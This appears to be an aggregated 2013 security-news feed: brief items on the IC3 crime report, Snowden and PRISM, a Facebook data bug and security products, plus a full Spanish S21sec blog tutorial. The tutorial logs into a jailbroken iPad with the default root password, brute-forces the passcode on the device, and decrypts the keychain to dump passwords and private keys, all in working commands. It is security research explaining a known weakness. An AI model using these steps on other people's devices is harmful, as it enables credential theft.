Findings show that SMBs with higher index scores are able to better manage increasing computing complexity while spending less on IT than those with lower scores(author unknown)

Interesting story with a lot of details.

schneier

More Than 280,000 Complaints of Online Criminal Activity Reported in 2012 Fairmont, WV — Today the Internet Crime Complaint Center (IC3) released the 2012 Internet Crime Report—a summary of reported fraudulent activity, including data and statistics. In 2012, the IC3 received and processed 289,874 complaints, averaging more than 24,000 complaints per month. Unverified losses reported noreply@blogger.com (Seguridad de la Información)

La Policía ecuatoriana alertó de la presencia en el internet de un virus malicioso que utiliza el nombre y el logo de la institución para estafar a ciudadanos, delito que también ha sido reportado en otros países. El "Virus de la Policía" es una estafa electrónica reportada en Europa y América Latina. Foto: Policía Nacional  Se trata del “Virus de la Policía”, un software noreply@blogger.com (Seguridad de la Información)

SnoopWall blocks remote access to mobile devices by protecting data-leakage ports(author unknown)

MSP-focused solution offers complete protection for networks, endpoints, and mobile devices(author unknown)

PrivateCore vCage software protects data in use with full memory encryption(author unknown)

Only 35 percent of businesses say they can actually detect security breaches within minutes(author unknown)

Hace unos meses, en un post anterior, os comentábamos cómo funcionaba DataProtection de iOS para proteger las credenciales, y cuál de ellas quedaban automáticamente accesibles aún sin disponer del PassCode, debido al uso de las clases "Always" o "AfterFirstUnlock", pero... ¿Qué ocurre si el PassCode es excesivamente trivial? ¿Cuánto os protege un PassCode como "1234"?
Si alguna vez habéis probado a poner la contraseña erroneamente en un dispositivo iOS, habréis comprobado que tras ciertos intentos fallidos os introduce un tiempo de espera que va aumentando sucesivamente conforme nos equivocamos. Esta es una medida de seguridad bastante efectiva contra ataques de diccionario o fuerza bruta. Sin embargo, esta es una medida que en iOS está implementada en el propio interface, no en los internals del KeyChain, por lo que su efectividad se basa en que el atacante no tiene acceso al dispositivo por otro medio que no sea el interface de la pantalla táctil.
¿Podemos acceder por otros medios a estos dispositivos? La verdad es que sí, podemos haber obtenido acceso si el dispositivo tiene Jailbreak y la contraseña de SSH no ha sido cambiada (root:alpine), por ejemplo, o tras la explotación de alguna vulnerabilidad, bien sea tras la intervención del usuario, como ocurría con Jail0wnme, o de alguna vulnerabilidad en el bootloader como limera1n.
Si hemos obtenido acceso al dispositivo por alguno de estos medios, podemos usar los servicios y herramientas que forman parte de iphone-dataprotection para lanzar un ataque de fuerza bruta "desde dentro", que nos va a ayudar a evitar las protecciones que tiene iOS en su interface.
Si nos descargamos y compilamos los binarios de iphone-dataprotection, tendremos un directorio llamado "ramdisk_tools", que es donde están las herramientas que se incorporan en el RamDisk si queremos explotar limera1n, pero que por supuesto podemos utilizar ante cualquier otro acceso. Yo voy a usar un iPad Jailbreakeado con SSH root:alpine, pero lo mismo se podría hacer, por ejemplo, descargando el mismo binario de algún sitio tras haber obtenido una shell remota:
$ scp ramdisk_tools/bruteforce root@192.168.1.109:
$ ssh root@192.168.1.109
root@192.168.1.109's password: alpine
S21Pad:~ root#

Una vez dentro, podemos utilizar el binario llamándolo sin argumentos y realizará una fuerza bruta contra todos los pines de 4 dígitos:
# ./bruteforce   
Writing results to 7b93c4e7f008a64b.plist
keybag id=1
0000
0001
[...]
0020
0021
Found passcode : 0021
Keybag version : 3
Keybag keys : 10
Class Wrap Key
11 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
10 0 bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
9 0 ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
8 0 dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
7 0 11111111111111111111111111111111111111111111111111111111111111
6 0 22222222222222222222222222222222222222222222222222222222222222
5 0 33333333333333333333333333333333333333333333333333333333333333
3 0 44444444444444444444444444444444444444444444444444444444444444
2 0 55555555555555555555555555555555555555555555555555555555555555
1 0 66666666666666666666666666666666666666666666666666666666666666

Passcode key : beefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeefbeef
Key 0x835 : f00f00f00f00f00f00f00f00f00f00f00f
Writing results to 7b93c4e7f008a64b.plist

Me vais a perdonar que oculte las claves extraídas, porque éstas son las que cifran la información y si las tuvierais podrías descifrar el KeyChain o los ficheros aunque cambiara el PassCode en el futuro, a no ser que restaurara de fábrica el dispositivo.
Las claves necesarias para el descifrado se escriben en un fichero PLIST, así que ahora lo que necesitamos es sacar del iPad ese PLIST y el propio KeyChain y a descifrar. Esto es posible porque con el ataque de fuerza bruta ya hemos obtenido las claves de cifrado reales, por lo que ya no tenemos que calcular nada en el dispositivo.
$ scp root@192.168.1.109:/private/var/Keychains/keychain-2.db .
$ scp root@192.168.1.109:7b93c4e7f008a64b.plist .

Ahora que tenemos el KeyChain cifrado y las claves, ya solo tenemos que utilizar otra de las herramientas de esta suite para descifrar el contenido:
$ python python_scripts/keychain_tool.py -d keychain-2.db 7b93c4e7f008a64b.plist 
Keybag unlocked with passcode key
[...]
---------------------------------------------------------------------------------------------------
|                                                         Passwords                                                               |
---------------------------------------------------------------------------------------------------
|Service               |Account            |Data       |Access group     |Protection class              |
---------------------------------------------------------------------------------------------------
|push.apple.com  |                         |>8***** |com.apple.apsd |AlwaysThisDeviceOnly  |
|AirPort               |WLAN_72AF  |46***** |apple                  |AfterFirstUnlock             |
|AirPort               |Lemonparty     |89***** |apple                  |AfterFirstUnlock             |
|_LineUserInfo    |region              |ES           |ZW4U99SQQ3 |WhenUnlocked               |
|AirPort               |S21sec              |no****    |apple                |AfterFirstUnlock             |
|AirPort               |WLAN_8D       |Z0****    |apple               |AfterFirstUnlock              |
---------------------------------------------------------------------------------------------------

Así nos mostrará, al igual que en el anterior post, las credenciales almacenadas, salvo que ahora nos muestra también las que han sido guardadas con la clase "WhenUnlocked", que en este caso no son muchas o ninguna, pero la diferencia sí que la vamos a ver claramente si volcamos los certificados almacenados, ya que en esta ocasión las claves privadas de los certificados sí que vamos a poderlas volcar:
$ python python_scripts/keychain_tool.py -c keychain-2.db 7b93c4e7f008a64b.plist
Keybag unlocked with passcode key
Saving certificate com.apple.ubiquity.peer-uuid.738C1396-D023-4D7D-9E11-806FF5331CDB_com.apple.ubd.crt
Saving certificate 74C7946F-0525-445B-A24E-4FBC74E8F589_lockdown-identities.crt
Saving certificate broker.banco.com_com.apple.certificates.crt
Saving certificate 74C7946F-0525-445B-A24E-4FBC74E8F589_com.apple.apsd.crt
Saving key com.apple.ubiquity.peer-uuid.738C1396-D023-4D7D-9E11-806FF5331CDB_com.apple.ubd.key
Saving key 74C7946F-0525-445B-A24E-4FBC74E8F589_lockdown-identities.key
Saving key 74C7946F-0525-445B-A24E-4FBC74E8F589_com.apple.apsd.key

Por supuesto, también podemos usar el PassCode para acceder al dispositivo por el interfaz, desbloquearlo, quitar el PassCode, ... en fin, todo lo que queramos.

Jose SelviDept. Servicios Profesionales S21sec
Twitter / Blognoreply@blogger.com (S21sec Labs)

Malwarebytes has released the first public beta of Malwarebytes Anti-Exploit, a rebranded and improved version of ZeroVulnerabilityLabs’ ExploitShield.

Just as in its previous incarnation, Anti-Exploit is an extremely easy-to-use tool which protects popular applications from zero-day exploits, web-based vulnerability exploits and more.

Tags: Software-ProgrammingViruses & Malwarel33tdawg

Former United States National Security Agency (NSA) employee turned whistleblower Edward Snowden has reportedly revealed attacks by his former employer on network operator Pacnet.

Speaking to Hong Kong's South China Morning Post, Snowden said Pacnet's computers in Hong Kong were attacked by America but did not provide information as to the motive nor whether Pacnet suffered any damage in the now-closed hacking operation.

Tags: NSAChinaSecurityPRISMIndustry Newsl33tdawg

Yahoo has downplayed concerns that its plans to recycle inactive user IDs could leave users exposed to hackers, saying only 7 per cent of those IDs are tied to actual Yahoo email accounts.

The internet company, which announced last week it would release user IDs that have been inactive for more than 12 months so that other people can claim them, was pressed to defend the plan after critics warned that hackers who take control of inactive accounts could also assume the identities of the accounts' previous owners.

Tags: YahooSecurityl33tdawg

Everybody's talking about PRISM, the U.S. government's electronic surveillance program.

We don't know all the details about PRISM (also called US-984XN). But we learned enough from a badly designed PowerPoint presentation leaked by NSA contractor Edward Snowden to feel outraged by its reach and audacity. In a nutshell, PRISM (and related telephone surveillance programs) take a big data approach to spying on foreign terrorists using American servers.

Tags: NSAPRISMSecurityPrivacyl33tdawg

California's Department of Financial Institutions has issued a cease and desist letter to the Bitcoin Foundation for "allegedly engaging in the business of money transmission without a license or proper authorization," according to Forbes. The news comes after Bitcoin held its "Future of Payments" conference in San Jose last month.  (The license information is available on CA.gov and Forbes placed the cease and desist letter on Scribd.)

Tags: USBitCoinLaw and Orderl33tdawg

Google's acquisition of Israeli mobile navigation app vendor Waze is going to get an anti-trust examination by the FTC.

Earlier this month, Mountain View's acquisition team flipped open the wallet to the tune of $US1.3 billion for the social map app, its sub-$US70 million revenue, and its claimed fifty million users. When the Chocolate Factory made its buy, Waze was also attracting the interest of Apple and Facebook.

Tags: FTCGoogleWazel33tdawg

A bug on Facebook leaked email addresses and phone numbers provided by some 6 million people on the site to certain other users, the company revealed Friday.

What sparked the problem is a bit complicated. The bug caused some of the information that the social network stores to make friend recommendations to be inadvertently stored in association with people's contact information as part of their Facebook account, the company said Friday on its website.

Tags: FacebookSecurityPrivacyl33tdawg

Edward Snowden, the former U.S. National Security Agency contractor who leaked information about the country's surveillance programs, left Hong Kong Sunday to a third country.

Snowden left Hong Kong on his own accord for a third country through "a lawful and normal channel," despite an earlier request from the U.S. to Hong Kong for the issue of a provisional warrant of arrest against him, the Hong Kong government said in a statement Sunday. The Hong Kong authorities did not name the country Snowden was headed to.

Tags: NSAPRISMUSIndustry Newsl33tdawg

Recent disclosures of U.S. government surveillance of our phone and Internet activity have heightened interest in services that promise not to collect or share our personal information.

Tags: Privacyl33tdawg

There was a moment of panic in the open source community this week when a developer on the MariaDB fork of MySQL discovered that Oracle had quietly changed the license on all the man pages for MySQL from GPL to a restrictive proprietary license two months earlier. Prompted by the bug report, Oracle's staff quickly discovered that an error had been made in the build system and promised to immediately undo the change and restore the GPL to all of MySQL. Problem solved!

Tags: MySQLIndustry Newsl33tdawg

On June 20, 2013, at 11:24 p.m., the sun erupted with an Earth-directed coronal mass ejection or CME, a solar phenomenon that can send billions of tons of particles into space that can reach Earth one to three days later. These particles cannot travel through the atmosphere to harm humans on Earth, but they can affect electronic systems in satellites and on the ground.

Tags: Sciencel33tdawg